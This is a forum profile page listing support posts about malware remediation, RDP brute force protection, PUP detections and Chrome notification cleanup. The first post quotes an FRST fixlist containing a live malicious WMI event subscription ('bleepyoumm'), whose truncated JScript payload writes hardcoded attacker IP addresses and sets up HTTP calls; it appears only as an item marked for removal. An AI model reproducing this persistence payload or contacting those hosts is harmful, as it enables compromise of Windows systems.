Jump to content

kaizen

Members
  • Posts

    17
  • Joined

  • Last visited

Posts posted by kaizen

  1. Hello mlonabaugh,

    No problem.  Copy the quoted text below into Notepad and save it as Fixlist.txt.

     

    HKLM\...\Command Processor: C:\ProgramData\SQLAGENTVHC.exe <==== ATTENTION
    cmd: certutil -hashfile "C:\ProgramData\SQLAGENTVHC.exe" sha256
    C:\ProgramData\SQLAGENTVHC.exe
    GroupPolicy: Restriction ? <==== ATTENTION
    GroupPolicyScripts: Restriction <==== ATTENTION
    Policies: C:\Users\aadmincopy\NTUSER.pol: Restriction <==== ATTENTION
    Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
    Policies: C:\Users\backup_svc\NTUSER.pol: Restriction <==== ATTENTION
    Policies: C:\Users\mlonabaugh\NTUSER.pol: Restriction <==== ATTENTION
    Policies: C:\Users\NTRSupport1\NTUSER.pol: Restriction <==== ATTENTION
    Policies: C:\Users\NTRSupport2\NTUSER.pol: Restriction <==== ATTENTION
    Policies: C:\Users\NTRSupport3\NTUSER.pol: Restriction <==== ATTENTION
    Policies: C:\Users\NTRSupport4\NTUSER.pol: Restriction <==== ATTENTION
    Policies: C:\Users\printing\NTUSER.pol: Restriction <==== ATTENTION
    Policies: C:\Users\SPAdmin\NTUSER.pol: Restriction <==== ATTENTION
    Policies: C:\Users\SPService\NTUSER.pol: Restriction <==== ATTENTION
    Powershell: Get-WMIObject -Namespace root\Subscription -Class __EventConsumer
    Powershell: Get-WMIObject -Namespace root\Subscription -Class ActiveScriptEventConsumer
    WMI:subscription\__FilterToConsumerBinding->\\.\root\subscription:ActiveScriptEventConsumer.Name=\"bleepyoumm_consumer\"",Filter="\\.\root\subscription:__EventFilter.Name=\"bleepyoumm_filter\":: <==== ATTENTION
    WMI:subscription\__TimerInstruction->bleepyoumm_itimer:: <==== ATTENTION
    WMI:subscription\__IntervalTimerInstruction->bleepyoumm_itimer:: <==== ATTENTION
    WMI:subscription\__EventFilter->bleepyoumm_filter::[Query => select * from __timerevent where timerid="bleepyoumm_itimer"] <==== ATTENTION
    WMI:subscription\ActiveScriptEventConsumer->bleepyoumm_consumer::[ScriptText => var toff=3000;var fso=new ActiveXObject("Scripting.FilesystemObject");var http=new ActiveXObject("Msxml2.ServerXMLHTTP");if(!fso.FileExists('wpd.xml')){var f=fso.CreateTextFile('wpd.xml',2);f.writeLine('69.30.200.178'+'\r\n'+'45.116.13.219'+'\r\n'+'150.107.76.227'+'\r\n'+'103.213.246.23');f.Close(); (the data entry has 2402 more characters).] <==== ATTENTION 

    Thanks again,

    • Like 1
  2. Hello mlonabaugh,

    Thank you for reaching out to us regarding this issue.  I'm from the Nebula team that handles Malware Remediation.  I was able to review your FRST logs from the BC forum and have made you a Fixlist that should resolve the issue.  Please follow the steps below to to use the attached Fixlist.txt:

    1. Download the file Fixlist.txt that is attached to this post and save it to the same folder as FRST64.exe
    2. Open FRST64.exe and click Fix
    3. You should get a pop-up stating the Fix completed and that a Fixlog.txt was generated. Click OK.

    Please attach the Fixlog.txt to your reply, and let me know if you're still seeing the scan results after rebooting the server.

    Thanks again,

    Fixlist.txt

    • Like 1
  3. Hello Mark,

    Thank you for reaching out to us.  At this time, Brute Force Protection for FTP only integrates directly with the FTP software embedded within the Server OS.  This is because the embedded FTP server logs connection attempts and failures within the Security Event Log similar to RDP connection attempts.  Third party FTP software handles logging internally and would require unique integrations to monitor their connection logs.

    If you have any other questions or concerns, please let me know.

    Thanks again,

  4. Hello Chris,

    You're very welcome!  I'm glad to hear your RDP is already behind a VPN and not directly-accessible from the internet.  

    LAN to LAN failed login attempts do show up as well unless you check the box to 'Prevent private network connections from being blocked'.  

    To learn more about these attempts, as well as if and when a successful connection was made, you'll need to review the Terminal Services Operational Logs in the Windows Event Viewer.
    https://superuser.com/questions/409099/is-there-a-log-file-for-rdp-connections

    Thanks again,

  5. Hello Chris,

    Thank you for reaching out to us for more information regarding the RDP Intrusion Detections.  This alert is created by the Brute Force Protection setting within your Nebula policy.  With Brute Force Protection enabled, the default setting is "monitor mode" which will trigger a Remote Intrusion Detection when your Windows Remote Desktop (RDP) sees 5 failed attempts within 5 minutes from the same IP address.

    You can learn more about Brute Force Protection here:
    https://support.malwarebytes.com/hc/en-us/articles/360056829274-Configure-Brute-Force-Protection-in-Malwarebytes-Nebula

    Monitor mode will give you a general idea of the number of failed login attempts you are seeing, and help you identify if your RDP is under a attack from a Brute Force attempt.  Switching to Block Mode will enable the Windows Firewall and block the offending IP for the time you set within the policy.  Before enabling Block Mode, I would suggest first enabling Windows Firewall on your devices to ensure it's compatible with your current configuration and add any Allow rules as needed to the Windows Firewall.  Once you are confident Windows Firewall is working properly, you can enable Block Mode and Malwarebytes will create temporary Windows Firewall rules to block the IPs that are attempting to Brute Force for the time you specified within the policy.

    You can also read more about hardening your RDP security in our article below, such as moving RDP behind a VPN, using a 3rd party remote access service, etc.
    https://blog.malwarebytes.com/security-world/business-security-world/2018/08/protect-rdp-access-ransomware-attacks/

    Thanks again,

     

  6. Thank you for sharing the detection report.  The block was from Chrome attempting to load the Restoro website.  Restoro is detected by Malwarebytes as a PUP (Potentially Unwanted Programs).  These are generally programs that are not harmful, but may be unwanted for reasons such as causing pop-ups or advertisements to appear, tracking user data, or making misleading claims.  You can read more about our specific detection for Restoro here:

    https://blog.malwarebytes.com/detections/pup-optional-restoro/

    VirusTotal won't have much for the Restoro.com website itself as the website is related to a PUP, but you can see the results for the Restoro downloader here:


    https://www.virustotal.com/gui/file/5d99408fc2f7bc85f2c4bc6dcd762008bfecd5c8dcaaacf9c9bdc2914ddd22b1/detection

     

    Thanks again!

  7. Hello jgt1942,

    Thanks for sharing the screenshots and log files.  The detections you are seeing are likely from Browser Push Notification entries within Chrome.  These notification entries can be used to display unwanted advertisements, or even messages to try and trick you into thinking your computer is infected.

    Open your Chrome browser and paste the following address into the address bar, and then press Enter on your keyboard:
    chrome://settings/content/notifications

    This will bring you to the Site Notifications settings page.  Turning off the option at the top for 'Sites can ask to send notifications' will turn off all notifications and should stop the Malwarebytes detections. 

    If you would like to instead fine-tune this setting, inspect the list of allowed sites for any you do not recognize or trust.  Click the three-dots icon next to the unwanted entry and choose Block.

    Thanks again,

    • Like 1
  8. Hello Tony,

    I'd like to get additional details regarding the detection.  Please double-click one of the detection entries in the History page as shown in your screenshot.

    This will bring up a new page with additional details.  Choose Export at the bottom and then Export to TXT.  Save the report as Detection.txt to your desktop.

    Please share the Detection.txt file as an attachment here.

    Thanks again,

  9. MBAM Premium 3.1.2.1733 Update Package 1.0.2231 Component package 1.0.141 on two Windows x64 Creators Update systems.

    Just started happening tonight.

    If MBAM Premium is running when World of Warcraft is launched, you will get randomly disconnected anywhere between 10s and 2min of gameplay with WoW error WOW51900319.

    Quick MBAM, game runs just fine.

    If you open MBAM while World of Warcraft has been running great for 20 minutes, you get disconnected.

Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.